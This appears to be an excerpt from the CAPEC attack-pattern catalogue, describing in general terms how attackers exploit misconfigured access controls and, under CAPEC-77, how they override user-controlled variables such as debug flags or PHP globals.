An attacker exploits a weakness in the configuration of access controls and is able to bypass the intended protection that these measures guard against and thereby obtain unauthorized access to the system or network. Sensitive functionality should always be protected with access controls. However configuring all but the most trivial access control systems can be very complicated and there are many opportunities for mistakes. If an attacker can learn of incorrectly configured access security settings, they may be able to exploit this in an attack.
CAPEC-77: Manipulating User-Controlled Variables
This attack targets user controlled variables (DEBUG=1, PHP Globals, and So Forth). An adversary can override variables leveraging user-supplied, untrusted query variables directly used on the application server without any data sanitization. In extreme cases, the adversary can change variables controlling the business logic of the application. For instance, in languages like PHP, a number of poorly set default configurations may allow the user to override variables.